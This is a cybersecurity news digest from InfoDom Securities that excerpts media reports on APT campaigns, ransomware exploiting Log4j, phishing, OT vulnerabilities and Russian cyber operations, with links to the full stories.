Daily Drop (171)
China-Linked ToddyCat APT Pioneers Novel Spyware
FROM THE MEDIA:A threat group that may have been among the first to exploit the ProxyLogon zero-day vulnerability in Exchange Servers last year is using a pair of dangerous and previously unseen malware tools in a cyber espionage campaign targeting military and government organizations in Europe and Asia.
Researchers at Kaspersky who first detected the group's activities this week described the tools as malware designed to enable long-term persistence on an organization's public-facing Web servers and giving attackers the ability to move laterally and penetrate deeply into compromised networks.
The malware tools have features that allow their functionality to be extended at will, but Kaspersky has been unable so far to determine the full range of their capabilities, the vendor noted.
READ THE STORY: DarkReading
AVOSLOCKER Ransomware Deployed in LOG4SHELL ATTACK
FROM THE MEDIA: The month-long ransomware attack, which impacted an unnamed company, targeted instances of the VMware Horizon Unified Access Gateway that were vulnerable to the Log4j flaw. The attacker first exploited the series of Apache vulnerabilities related to Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832) that can potentially allow for remote code execution on vulnerable Unified Access Gateways via a low-privilege non-root user (‘gateway’). Threat actors used a newer variant of AvosLocker previously discovered earlier this year, which targets Linux environments in addition to Windows machines; the attack coupled with these recent changes demonstrate how AvosLocker is "likely to proliferate in the future," said Cisco Talos researchers in a Tuesday analysis.
"In the current ransomware cartel landscape [this recent attack] could be either an affiliate using their own TTPs or a new behavior that has been provided as part of the procedures provided by the cartel," said Guilherme Venere, researcher with Cisco Talos. "We commonly see these groups start leveraging new vulnerabilities in their attacks, for instance."
READ THE STORY: DUO
Russian govt hackers hit Ukraine with Cobalt Strike, CredoMap malware
FROM THE MEDIA: The Ukrainian Computer Emergency Response Team (CERT) is warning that Russian hacking groups are exploiting the Follina code execution vulnerability in new phishing campaigns to install the CredoMap malware and Cobalt Strike beacons.
The APT28 hacking group is believed to be sending emails containing a malicious document name "Nuclear Terrorism A Very Real Threat.rtf.". The threat actors selected the topic of this email to entice recipients to open it, exploiting the fear that's spread among Ukrainians about a potential nuclear attack.
Threat actors also used a similar tactic in May 2022, when CERT-UA identified the dissemination of malicious documents warning about a chemical attack.
READ THE STORY: Bleeping Computer
These fake voicemail phishing emails want to steal your passwords
FROM THE MEDIA: Criminals are targeting people in US military and tech organizations with so-called "vishing", where supposed links to voicemail dupe victims into revealing credentials for Microsoft Office 365 software and Outlook email accounts.
Vishing isn't a new threat: the FBI raised an alarm about it in mid-2020 but it was spotlighted by Interpol this week as a growing threat when it announced arrests of 2,000 people accused of online fraud, including the lucrative category of business email compromise (BEC).
According to US security firm Zscaler, there has been a resurgence in vishing since May that's targeting employees in software security, US military, security solution providers, healthcare and pharmaceutical, and the manufacturing supply chain.
READ THE STORY: ZDNET
Okta says Lapsus$ incident was actually a brilliant zero trust demonstration
FROM THE MEDIA: Okta has completed its analysis of the March 2022 incident that saw The Lapsus$ extortion crew get a glimpse at some customer information, and concluded that its implementation of zero trust techniques foiled the attack – and that its (former) outsourced customer service provider Sitel was largely to blame for the confusion surrounding the incident.
So said Brett Winterford, Asia-Pacific and Japan chief security officer of the identity-management-as-a-service vendor, at the Gartner Risk and Security Summit in Sydney today.
READ THE STORY: The Register
How Russia’s vaunted cyber capabilities were frustrated in Ukraine
FROM THE MEDIA: A quiet partnership of the world’s biggest technology companies, U.S. and NATO intelligence agencies, and Ukraine’s own nimble army of hackers has pulled off one of the surprises of the war with Russia, largely foiling the Kremlin’s brazen internet hacking operations.
Russia’s cyber-reversals haven’t resulted from lack of trying. Microsoft counts nearly 40 Russian destructive attacks between Feb. 23 and April 8, and Rob Joyce, the National Security Agency’s cybersecurity director, said the Russians had attempted an “enormous” cyber offensive. The Russians sabotaged a satellite communications network called Viasat in the opening days of the war, for example, with the damage spilling over into other European countries.
READ THE STORY: WP
Did Russian hackers blow up a Texas LNG pipeline on June 8?
FROM THE MEDIA: According to two sources, around the time of Russia's late February invasion of Ukraine, a cyber unit of Russia's GRU military intelligence service again conducted targeting-reconnaissance operations against a major U.S. liquefied natural gas exporter, Freeport LNG.
U.S. LNG exports have long been a priority concern for Russia, viewed by Russian President Vladimir Putin as a means for the United States to undercut Russia's domination of the European gas market.
On June 8, Freeport LNG suffered an explosion at its liquefaction plant and export terminal on Texas's Quintana Island. The damage suffered means the facility is not expected to resume major operations until late 2022. The June 8 disruption had an immediate impact in spiking already soaring European gas prices and has reinforced Russia's ability to hold gas supplies to Europe at risk in retaliation for the European Union sanctions imposed on Russia over the war in Ukraine. U.S. LNG futures have fallen significantly since the explosion.
READ THE STORY: Washington Examiner
Siemens, Motorola, Honeywell and more affected by 56 ‘ICEFALL’ vulnerabilities
FROM THE MEDIA: Security researchers have discovered 56 new vulnerabilities – collectively known as “ICEFALL” – that affect several of the largest operational technology (OT) equipment manufacturers supplying critical infrastructure organizations.
The vulnerabilities affect Siemens, Motorola, Honeywell, Yokogawa, ProConOS, Emerson, Phoenix Contract, Bentley Nevada, Omron and JTEKT. Discovered by researchers with Forescout, the 56 vulnerabilities were disclosed in coordination with the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and other government agencies around the world.
The vulnerabilities are broken down into four general categories: Insecure engineering protocols, weak cryptography or broken authentication schemes, insecure firmware updates and remote code execution via native functionality.
READ THE STORY: The Record
Increasing China’s U.S. Cyber Espionage Allegations Support Internet Governance Aspirations
FROM THE MEDIA: Recently, Chinese media has published articles about a report provided by Burmese-based Anzer, a cybersecurity company that detailed alleged U.S. military and government agencies efforts to remotely steal more than 97 billion pieces of global Internet data, and 124 billion phone records in the last 30 days. The report specifically details the suspected involvement of the National Security Agency’s Tailored Access Operations (TAO), an elite cyber group believed to be involved of some of the United States’ more surreptitious cyber activity. Anzer’s report supposedly revealed another weapon platform – “boundless informant” – a tool that allows for big data summary analysis and visualization. At this time, attempts to acquire this report have not been successful, and it information pertaining to it has been made available through news sources, many of them English versions of Chinese outlets, and even mentioned in China’s Foreign Ministry spokesman’s press conference remarks.
READ THE STORY: OODALOOP
One Million Facebook Credentials Compromised in Four Months by Ongoing Phishing Campaign
FROM THE MEDIA: Facebook credentials are being stolen at an alarming clip by a large scale phishing campaign, according to anti-phishing platform Pixm. Security researchers with the company have documented a credential harvesting campaign that has been active since late 2021, and has been highly successful in duping victims using an authentic-looking spoofed Facebook login page. The attacker makes use of links that appear to go to videos hosted on Facebook, and that ask for user Facebook credentials to display the video.
The first tip-off to the phishing campaign was the discovery of a fake Facebook login portal by a Pixm subscriber in September 2021. The same portal page continues to be used today; it closely resembles a standard login page, but asks the viewer (in red text across the top of the page) to enter their Facebook credentials to be allowed access to a video.
READ THE STORY: CPO MAG
With Artificial Intelligence, Short-term risk aversion is Long-term risk Seeking
FROM THE MEDIA: On November 27, 2020, Iran’s top nuclear scientist was assassinated. The initial accounts differed wildly, and it took roughly ten months for the New York Times to break the real story. In prose that could have come from a sci-fi novel, the world learned that Israeli intelligence operatives had carried out the assassination with “a high-tech, computerized sharpshooter [rifle] kitted out with artificial intelligence and multiple-camera eyes, operated via satellite and capable of firing 600 rounds a minute.”
A more salient, tactical manifestation of autonomous capabilities is drone warfare. Particularly lethal is the American-made, multipurpose, loitering munition Altius 600 that has a range of 276 miles and can operate at a ceiling of twenty-five thousand feet, providing intelligence, surveillance, and reconnaissance, counter–unmanned aircraft systems effects, and precision-strike capabilities against ground targets. Many systems like the Altius “will use artificial intelligence to operate with increasing autonomy in the coming years.”
But AI-enabled weapons systems are already being used for lethal targeting—for example, the Israeli-made Orbiter 1K unmanned aircraft system, a loitering munition recently used by the Azerbaijani military in the Second Nagorno-Karabakh War, independently scans an area and automatically detects and destroys stationary or moving targets kamikaze-style. If the Orbiter 1K does not observe a target right away, it will loiter above the battlespace and wait until it does. As two instances of AI-augmented, autonomous weapons being used to kill remotely, the assassination and the drone warfare of the Second Nagorno-Karabakh War draw attention to longstanding concerns about AI-enabled machines and warfare.
READ THE STORY: MWI
Political Games Empower Russian Cyberattacks
FROM THE MEDIA: The United States faces an alarming and growing threat of cyberattacks from Russia. Some in Congress would compound these dangers by enacting legislation that would force America’s leading tech companies to allow access to their software, hardware and operating systems to customers and competitors in the U.S. and overseas.
The Cybersecurity & Infrastructure Agency (CISA) has been blunt about Russia.
“The Russian government engages in malicious cyber activities to enable broad-scope cyber espionage, to suppress certain social and political activity, to steal intellectual property, and to harm regional and international adversaries,” CISA says on its website.
During a “60 Minutes” interview on April 17, CISA director Jen Easterly said: “We are seeing evolving intelligence about Russia planning for potential attacks. And we have to assume that there’s going to be a breach. There’s going to be an incident. There’s going to be an attack.”
Last year, a ransomware attack on the Colonial Pipeline, thought to have been done by criminals in Russia but not the Russian government itself, caused widespread disruption even though it lasted just a few days. Coordinated, sustained attacks from Russia’s government would impose exponentially more harm.
READ THE STORY: Inside Sources
Bots are Twitter's Problem and Not China, Says Elon Musk
FROM THE MEDIA: Before he could complete his $44 billion take over of Twitter Inc., the Chief Executive Officer, Elon Musk, noted that the social media platform has several issues that it must patch up. These include acquiring a precise measure of bots the social media platform has and finalizing the funding for the deal.
In an interview with Bloomberg News, Editor-in-Chief John Micklethwait at the Qatar Economic Forum in Doha, Musk said that the ratio of fake, spam and bot accounts on the said platform is a very significant matter. Banks have already committed to giving $13 billion of debt financing to Elon Musk's possession, and the lenders include Morgan Stanley, Bank of America Corp., and Barclays Plc.
Musk has repeatedly asked Twitter for fake account disclosures after cutting the deal. This fueled speculation that he might want to cut the deal's price or walk away. The SpaceX CEO's lawyer also said that Twitter must cooperate fully by giving the data Musk has requested so that he can guarantee the debt financing that is critical to polish the deal.
READ THE STORY: ITech Post
A Perspective on Russian Cyberattacks and Disinformation
FROM THE MEDIA: Mr. Gerstell said it is very hard to use cyberattacks to produce “a strategic or enduring effect.” Generally, attacks result in transient effects such as stopping a server from working properly or stealing information, which can be damaging, but victims can recover from these setbacks relatively quickly. Using cyberattacks in certain circumstances can however achieve a more strategic effect. Attacks on operational technology to knock out electricity grids or telephone and internet infrastructure can be highly damaging, for example, but such attacks take a lot of planning and are difficult to execute at scale.
Another way to achieve a strategic impact is to couple cyberattacks with disinformation. According to Mr. Gerstell, alongside the attacks on Ukrainian banks and ATMs, Russia sent text messages to citizens in some of the eastern cities, telling them they wouldn’t be able to withdraw money. “What else do you need to do to cause panic?” he said.
READ THE STORY: WSJ
‘Everything’ in app popular with US troops is ‘seen in China,’ new report says
FROM THE MEDIA: TikTok has grown in popularity among U.S. service members as a place to share the highs and lows of military service, but it has remained a concern for the Pentagon because of its ties to China. And a recent news article based on leaked audio recordings shows why.
Records first reported by BuzzFeed News reveal more than a dozen statements from TikTok employees saying engineers in China “had access to U.S. data between September 2021 and January 2022, at the very least.” TikTok’s parent company is ByteDance, a Chinese company based in Beijing. And despite TikTok claiming that U.S. user data is safe, evidence collected by BuzzFeed News shows otherwise.
READ THE STORY: Task and Purpose
Cyber options may grow more attractive to Russia as kinetic operations stall
FROM THE MEDIA: Reuters reports that US Deputy Treasury Secretary Wally Adeyemo warned the Bank Policy Institute last week that the threat of Russian cyberattack remained high. The Treasury Department reiterated its commitment to intelligence sharing during a period of heightened threat. "Treasury’s commitment to sharing appropriate intelligence and fostering an ongoing, real-time dialogue with financial institutions about threats as they arise."
Tanium's Teddra Burgess argues, in an essay published Friday by SC Media, that Russia's war against Ukraine represents a template for future, broader, cyber operations in other hybrid wars. She stresses the threat of both supply chain attacks and the disruption of critical infrastructure. She also argues that assessing that threat requires an understanding of the role criminal groups play in a hybrid war: "These most recent developments point to a concerning trend because of the escalation and atypical behavior displayed by established hacker groups, there’s potentially a power struggle in play after Russia’s invasion of Ukraine. This might explain the change in extortion patterns in an attempt to accumulate larger amounts of ill-gotten gain. As a result, we can expect to see this activity at the very least continue as we work to keep pace with the evolving attack surface."
READ THE STORY: The CyberWire
Tencent's WeChat wants no more talk of cryptocurrency and NFTs
FROM THE MEDIA: China's ban on cryptocurrency mining – and general dislike of any form of blockchain-based assets – has seen web giant Tencent clamp down on discussion of the subjects on its massive WeChat and Weixin messaging platforms.
News of Tencent's policy can be found in recent amendments to its terms of service which last week added a section about cryptocurrency and NFTs.
The added verbiage states that accounts engaged in discussion of crypto trading, exchange between bit-bucks and real money, or provision of pricing services for digital currencies, all need to stop it.
Account holders whose chats veer into the topics described above will be warned, and Tencent may restrict some functions of their accounts.
READ THE STORY: The Register
Microsoft pulls Windows 10/11 installation websites in Russia
FROM THE MEDIA: Microsoft has blocked the installation of Windows 10 and 11 in Russia from the company's official website, Russian state media reported on Sunday. Users within the country confirmed that attempts to download Windows 10 resulted in a 404 error message.
TASS reported that attempts to download a Windows 11 disk image (ISO) were diverted to a Microsoft Support contact page. The software is available, however, with a virtual private network (VPN) to disguise a computer's location – as are many other online resources.
Demand for VPNs reportedly rose by an unprecedented 2,692 percent in Russia as Instagram, Facebook, and Twitter removed access to apps from the location.
READ THE STORY: The Register
Items of interest
NASA tricks Artemis launch computer by masking data showing a leak
FROM THE MEDIA: NASA engineers had to work fast to avoid another leak affecting the latest Artemis dry run, just hours after an attempt to reboost the International Space Station (ISS) via the Cygnus freighter was aborted following a few short seconds.
The US space agency on Monday rolled the huge Artemis I stack back to its Florida launchpad having worked through the leaks and problems that had beset its previous attempt at fueling the beast in April for an earlier dress rehearsal of the final countdown.
As propellant was loaded into the rocket, controllers noted a hydrogen leak in the quick-disconnect that attaches an umbilical from the tail service mast on the mobile launcher to the core stage of the rocket.
Such a leak would normally trigger a hold in an actual launch. When warming the disconnect then chilling it again to align the seal did not work, the team "developed a plan to mask data associated with the leak," according to NASA. The "mask" – which prevented the data from triggering a hard stop by the ground launch computer – allowed tests to proceed.
READ THE STORY: The Register
Identify a location from a photo or video (geolocation) (Video)
FROM THE MEDIA: This tutorial is part 4 of the OSINT At Home series. It covers how to identify a location from a photo or video using Google Maps – also referred to as geolocation.
Using mountains to geolocate a photo or video (Video)
FROM THE MEDIA: The tutorial is an explainer of how to use mountain ranges and ridge-lines to geolocate a photo or video, specifically using the 3D mountains visible in Google Earth to identify the location of photos and videos.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at email@example.com